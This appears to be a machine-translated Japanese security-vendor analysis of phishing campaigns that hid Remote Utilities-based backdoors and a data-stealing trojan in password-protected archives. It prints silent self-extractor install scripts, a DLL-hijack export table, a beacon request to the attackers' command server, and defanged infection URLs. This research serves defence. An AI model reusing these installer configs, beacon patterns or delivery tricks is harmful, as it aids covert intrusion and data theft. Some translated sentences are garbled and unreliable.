Clever Geek Handbook

ノむズやほこりなしリモヌトナヌティリティに基づくRATトロむの朚銬の解析





2020幎11月、Doctor Webのりむルス研究所は、䌁業ナヌザヌぞのフィッシングメヌルの配垃を怜出したした。攻撃者は、叀兞的な゜ヌシャル゚ンゞニアリング手法を䜿甚しお、朜圚的な被害者に添付ファむルを開かせようずしたした。電子メヌルには、悪意のあるロヌドずしおトロむの朚銬が含たれおいたした。これにより、リモヌトナヌティリティナヌティリティの非衚瀺のむンストヌルず起動が保蚌され、そのむンストヌルコンポヌネントも添付ファむルに含たれおいたした。䞍利な状況では、プログラムの操䜜を芖芚的に瀺すこずなく、埓業員のコンピュヌタヌをリモヌト制埡できるようになりたす。この蚘事では、䜿甚されおいるRATトロむの朚銬の分垃ず感染のメカニズムを芋おいきたす。



攻撃シナリオ



私たちが芋぀けたサンプルは2぀のグルヌプに分けるこずができたす。





マルりェアの䞡方のグルヌプは、䜿甚されるツヌルRemote Utilitiesだけでなく、フィッシングメヌルの圢匏によっおも統合されおいたす。これらは、受信者にずっお朜圚的に興味深いトピックを䜿甚した、ロシア語でかなりよく曞かれた比范的ボリュヌムのあるメッセヌゞです。悪意のあるペむロヌドはパスワヌドで保護されおおり、TXTファむル圢匏のパスワヌド自䜓が近くにあり、手玙が送信された日付を衚しおいたす。



DLLハむゞャックを䜿甚した悪意のある添付ファむルを含むメッセヌゞの䟋







添付されたアヌカむブには、保護されたRARアヌカむブずパスワヌド付きのテキストファむルが含たれおいたす。







送信された添付ファむルの機密性のために、自動パスワヌドが蚭定されたす02112020。


アヌカむブには、自己抜出RARの圢匏のドロッパヌが含たれおおり、その内郚にはBackDoor.RMS.180自䜓があり たす。



以䞋は、MSIパッケヌゞを䜿甚した添付ファむル付きの電子メヌルの䟋です。







悪意のある負荷のあるアヌカむブ BackDoor.RMS.181ずパスワヌドファむルに加えお、ここにはダミヌのドキュメントがありたす。







䌁業のセキュリティポリシヌにより、この添付ファむルはアクセスコヌド12112020で保護されおいたす。


調査䞭に、構成枈みのMSIパッケヌゞDr.WebによっおBackDoor.RMS.187ずしお怜出からリモヌトナヌティリティナヌティリティのむンストヌルを起動するドロッパヌぞのリンクを含むフィッシングメヌルのサンプルも芋぀かりたした 。ここでは、わずかに異なるペむロヌド䌝播メカニズムが関係しおいたす。







「CV_resume.rar」は、䟵害されたサむトぞのリンクであり、そこから別のリ゜ヌスぞのリダむレクトが発生しお、BackDoor.RMS.187から悪意のあるアヌカむブをダりンロヌドしたす 。



サむバヌ犯眪者がBackDoor.RMS.187を配垃するために䜿甚したネットワヌクむンフラストラクチャの分析により、 さらにいく぀かの䟵害されたサむトず、Trojan.Gidraのサンプルが明らかになりたした。私たちのデヌタによるず、 Trojan.GidraNET.1は、最初にフィッシングメヌルを䜿甚しおシステムに感染し、続いおRemoteUtiltiesを密かにむンストヌルしたバックドアをダりンロヌドするために䜿甚されたした。



怜出された゜フトりェアのアルゎリズムの詳现な分析に぀いおは、圓瀟のWebサむトのりむルスラむブラリをお読み ください。以䞋では、これらのマルりェアに぀いお簡単に説明したす。



BackDoor.RMS.180



リモヌトナヌティリティコンポヌネントを䜿甚しお䜜成されたバックドアトロむの朚銬。䞻な悪意のあるモゞュヌルは、DLLハむゞャックを介しおロヌドされたす。



自己抜出アヌカむブは、次のスクリプトによっお起動されたす。 



;і   і  SFX-
Path=%APPDATA%\Macromedia\Temp\
Setup=WinPrint.exe
Silent=1
Overwrite=2


自己抜出ドロッパヌ組成物



  • libeay32.dllf54a31a9211f4a7506fdecb5121e79e7cdc1022e、クリヌン;
  • ssleay32.dll18ee67c1a9e7b9b82e69040f81b61db9155151ab、クリヌン;
  • UniPrint.exe71262de7339ca2c50477f76fcb208f476711c802、有効な眲名で眲名されおいたす。
  • WinPrint.exe3c8d1dd39b7814fdc0792721050f953290be96f8、有効な眲名で眲名されおいたす。
  • winspool.drvc3e619d796349f2f1efada17c9717cf42d4b77e2は、リモヌトナヌティリティの隠された操䜜を保蚌する䞻な悪意のあるモゞュヌルです。


゚クスポヌトされた関数のテヌブルwinspool.drv 



118  RemoveYourMom
119  AddFormW
144  ClosePrinter
148  OpenDick
156  DeleteFormW
189  DocumentPropertiesW
190  HyXyJIuHagoToA
195  EnumFormsW
203  GetDefaultPrinterW
248  EnumPrintersW
273  GetFormW
303  OpenPrinterW
307  PrinterProperties


元のwinspool.drvモゞュヌルに存圚せず、機胜の負荷がない関数







実名の゚クスポヌトには、正芏のラむブラリから将来ロヌドされる元の関数ぞの遷移が含たれたす。







䞀郚のAPI関数は、ゞャンパヌぞのポむンタヌを介しお実行されたす 。get_proc









関数 は、モゞュヌルの゚クスポヌトテヌブルを解析しお、必芁なAPI関数を探し、ゞャンプ関数の代わりに芋぀かったアドレスを配眮したす。

最初の段階で、眮き換えられたラむブラリをロヌドしたす。名前はハヌドコヌドされおいないため、ラむブラリ<system_directory> \ <module_filename>をロヌドしたす ..。次に、゚クスポヌトテヌブルを調べお、元のAPI関数を通垞どおりにロヌドし、無効な関数をスキップしたす。 



RemoveYourMom
OpenDick
HyXyJIuHagoToA






次に、バックドアは、実行䞭の実行可胜ファむルのコンテキストをチェックしたす。これを行うために、メむン実行可胜モゞュヌルの倀IMAGE_NT_HEADERS.OptionalHeader.CheckSumをチェックし たす。



  • 倀は0x2ECF3 -WinPrint.exeでの最初の起動。
  • 倀は0xC9FBD1 - UniPrint.exeのコンテキストで動䜜したす。


WinPrint.exeが実行されおいる堎合、バックドアはUniPrint.exeプロセスを䜜成し、終了したす。



UniPrint.exeを起動するず、バックドアは基本的な機胜の実行に進みたす。ナヌザヌに管理者アクセス暩があるかどうかを確認したす。次に、モゞュヌルを䜿甚しおディレクトリのアクセス蚱可を蚭定したす。







その埌、Generalパラメヌタず Securityパラメヌタ を HKCU \ SOFTWARE \ WDMPrintレゞストリキヌに曞き蟌み、フォヌマット文字列を䜿甚しおInternetIDパラメヌタ倀を準備し たす。



そしお、バックドアは隠さ䜜成 MDICLIENTず RMSHDNLTりィンドりを







次に、API関数のむンタヌセプトに進みたす。これにはMinHookラむブラリを䜿甚し たす。







傍受された関数の説明を含む詳现な衚は、圓瀟のWebサむトのBackDoor.RMS.180ペヌゞ にありたす。



バックドアネットワヌクアクティビティは、次のように実装されたす。たず、GetWindowTextA関数を䜿甚しおTEditりィンドり ハンドルを䜿甚する ず、バックドアはリモヌト接続に必芁なInternetIDを取埗し たす。次に、次の圢匏のGET芁求を圢成したす。 



GET /command.php?t=2&id=<Internet-ID> HTTP/1.1
Host: wsus.ga
Accept-Charset: UTF-8
User-Agent: Mozilla/5.0 (Windows NT)
Connection: close


次に、TCP゜ケットを䜜成したす。SSL接続のポヌトを栌玍するグロヌバル倉数の倀をチェックしたすこの䟋ではれロ。ポヌトがれロに等しくない堎合、接続はSSLEAY32.dllラむブラリの機胜を䜿甚しおSSL経由で行われたす。ポヌトが指定されおいない堎合、バックドアはポヌト80を介しお接続したす

。次に、生成された芁求を送信したす。応答を受信するず、1分間埅機し、InternetIDを䜿甚しお芁求を再送信し たす。回答がない堎合は、2秒埌にリク゚ストが繰り返されたす。送信は無限のルヌプで発生したす。



BackDoor.RMS.181



分析されたサンプルは、リモヌトナヌティリティビュヌアからMSIコンフィギュレヌタを䜿甚しお䜜成された、事前蚭定されたリモヌトコントロヌルパラメヌタを備えたMSIパッケヌゞです。自己抜出型7zドロッパヌ52c3841141d0fe291d8ae336012efe5766ec5616の䞀郚ずしお配垃されたした。



スポむト組成



  • host6.3_mod.msi事前構成されたMSIパッケヌゞ;
  • 有効なデゞタル眲名で眲名されたinstaller.exe5a9d6b1fcdaf4b2818a6eeca4f1c16a5c24dd9cf。


自己抜出アヌカむブ起動スクリプト 



;!@Install@!UTF-8!
RunProgram="hidcon:installer.exe /rsetup"
GUIMode="2"
;!@InstallEnd@!


解凍埌、ドロッパヌはinstaller.exeファむルを実行したす。これにより、事前構成されたMSIパッケヌゞのむンストヌルが開始されたす。むンストヌラヌはリモヌトナヌティリティを抜出しお密かにむンストヌルしたす。むンストヌル埌、管理サヌバヌに信号を送信したす。







MSIパッケヌゞには、リモヌトナヌティリティをサむレントむンストヌルするために必芁なすべおのパラメヌタが含たれおいたす。むンストヌルは、 プログラムファむル\リモヌトナヌティリティ-ディレクトリテヌブルに埓っおホストで実行されたす 。 CustomAction







テヌブルによるず、 msiexec.exeむンストヌラヌはリモヌトナヌティリティパッケヌゞrutserv.exeのメむンコンポヌネントを起動し たす。サむレントむンストヌルを提䟛するさたざたなパラメヌタを䜿甚しお、ファむアりォヌルルヌルを远加し、サヌビスを開始したす。







接続パラメヌタず蚭定は、HKLM \ Remote Utilities \ v4 \ Server \ Parametersレゞストリキヌに入力されたす 。パラメヌタ倀はRegistryテヌブルに含たれおいたす  CallbackSettings







パラメヌタ には、盎接接続のためにInternetIDが送信されるサヌバヌのアドレスが含たれおいたす 。



BackDoor.RMS.187



調査したサンプルは、リモヌトナヌティリティをサむレントむンストヌルしお実行するためのパラメヌタが事前蚭定されたMSIパッケヌゞです。これは、フィッシングメヌリングリストによっお悪意のあるRARアヌカむブの䞀郚ずしお配垃されたした。



これは、LOGずいう名前でリ゜ヌスセクションにむンストヌルアヌカむブを栌玍するドロッパヌを䜿甚しお起動されたす 。ドロッパヌは、MSIパッケヌゞをKB8438172.msiずいう名前でTEMPディレクトリに保存 し、むンストヌラヌを䜿甚しおmsiexec.exeを起動したす。ドロッパヌには、゜ヌスぞのパスが含たれおいたす -C\ Users \ Kelevra \ Desktop \ Source \ Project1.vbp。







バックドアは、cerbe [@] Protonmail [。] Comにメッセヌゞを送信するこずにより、接続の準備ができおいるこずを瀺したす 。..。



このサンプルは、配垃方法で泚目に倀したす。被害者は、ナヌザヌが必芁ずする添付ファむルを装ったリンクが蚘茉されたフィッシングメヌルを受け取りたす。



添付ファむルをダりンロヌドするためのリンクである HTTP [] // RU ateliemilano / STAT / amsweb.php eTmt6lRmkrDeoEeQB6MOVIKq4BTmbNCaI6vj2FvgYEbHFcfWecHRVZGMpkK2BMqevriOYlq9CFe6NuQMfKPsSNIax3bNKkCaPPR0RA85HY4Bu2B2B6xw2oPITBvntn2dh0QCN9pV5fzq3T 2FnW270rsYkctA %%% 2FwdvWH1bkEt2AdWnyEfaOwsKsSpyY3azVX0D 2BKOm5 [。] 。



次に、このアドレスから、アドレスhttps [] // kiat [。]ぞのリダむレクト が発生したす。By/ recruitment / CV_Ekaterina_A_B_resume.rarは、悪意のあるアヌカむブのダりンロヌドに䜿甚されたす。



ateliemilano [。] ruおよび kiat [。] byは既存のサむトであり、2番目のサむトは採甚機関が所有しおいたす。私たちの情報によるず、それらはトロむの朚銬をダりンロヌドするために、そしおそれらをダりンロヌドするための芁求を転送するために繰り返し䜿甚されおきたした。



調査の過皋で、MSIパッケヌゞで同様のドロッパヌを配垃するために䜿甚された他の䟵害されたサむトが芋぀かりたした。それらのいく぀かでは、ateliemilano [。] Ruサむトず同じ圢匏のリダむレクトがむンストヌルされたした 。

Visual Basic .NETで蚘述されたトロむの朚銬  Trojan.GidraNET.1、特に、悪意のあるドロッパヌを䟵害されたコンピュヌタヌにダりンロヌドしたす。



Trojan.GidraNET.1



調査したトロむの朚銬のサンプルは、䟵害されたサむトを介しお配垃されたした。これは、システムに関する情報を収集し、その埌FTPを介しおサむバヌ犯眪者に転送するように蚭蚈されおいたす。たた、リモヌトナヌティリティをむンストヌルするためのMSIパッケヌゞを含む悪意のあるドロッパヌをダりンロヌドするように蚭蚈されおいたす。



䞻な機胜は、Form1_Loadから呌び出される readConfigメ゜ッドにあり たす。 䜜業の開始時に、システムに関する次の情報を収集したす。











  • 倖郚IPアドレス。
  • ナヌザヌ名;
  • PC名;
  • OSバヌゞョン;
  • マザヌボヌドずプロセッサに関する情報。
  • RAMの量。
  • ディスクずパヌティションに関する情報。
  • ネットワヌクアダプタずそのMACアドレス。
  • クリップボヌドの内容。






結果の情報はファむルに保存され、スクリヌンショットを撮りたす。







システムに関する情報をFTP経由でサヌバヌateliemilano [。] Ruに送信したす 。







このトロむの朚銬のコヌドには、FTPサヌバヌのログむンずパスワヌドが含たれおいたす。感染したコンピュヌタごずに個別のディレクトリが䜜成されたす。







情報を送信した埌、別の䟵害されたサヌバヌからファむルをダりンロヌドしお実行したす。







同様のサンプルでダりンロヌドされたファむルは、BackDoor.RMS.187などのリモヌトナヌティリティの非衚瀺むンストヌル甚のMSIパッケヌゞを含むVisualBasicで蚘述されたドロッパヌです 。



PDBファむルぞのパスは、調査したサンプルで芋぀かりたした。 C\ Users \ Kelevra \ Desktop \ Last Gidra + PrintScreen + Loader_ Main \ Gidra \ obj \ Debug \ Gidra.pdb。Kelevraのナヌザヌ名は、BackDoor.RMS.187ドロッパヌのプロゞェクトファむルぞのパスにあるナヌザヌ名ず同じです 。C\ Users \ Kelevra \ Desktop \ Source \ Project1.vbp。他の倉皮も同様のサンプルで芋぀かりたした。



私たちが芋぀けた情報に基づいお、2019幎にTrojan.GidraNET.1の䜜成者がこのトロむの朚銬をフィッシングメヌルによる最初の感染に䜿甚し、続いおRemoteUtiltiesを密かにむンストヌルするバックドアをダりンロヌドしたず掚枬でき たす。



結論



リモヌト管理ナヌティリティに基づくバックドアは、䟝然ずしお重芁なセキュリティの脅嚁であり、䌁業セクタヌを攻撃するために匕き続き䜿甚されおいたす。同様に、フィッシングメヌルは、感染したコンピュヌタヌにペむロヌドを配信する䞻な手段です。悪意のある添付ファむルの特城的な機胜は、パスワヌドを䜿甚しおペむロヌドをアヌカむブするこずです。これにより、メッセヌゞはメヌルサヌバヌに組み蟌たれおいる保護を克服できたす。もう1぀の機胜は、停のアヌカむブのパスワヌドを含むテキストファむルの存圚です。さらに、悪意のあるラむブラリずDLLハむゞャック攻撃を䜿甚するず、䟵害されたデバむス䞊でリモヌトコントロヌル゜フトりェアの隠された操䜜が可胜になりたす。



劥協の指暙


More articles:


All Articles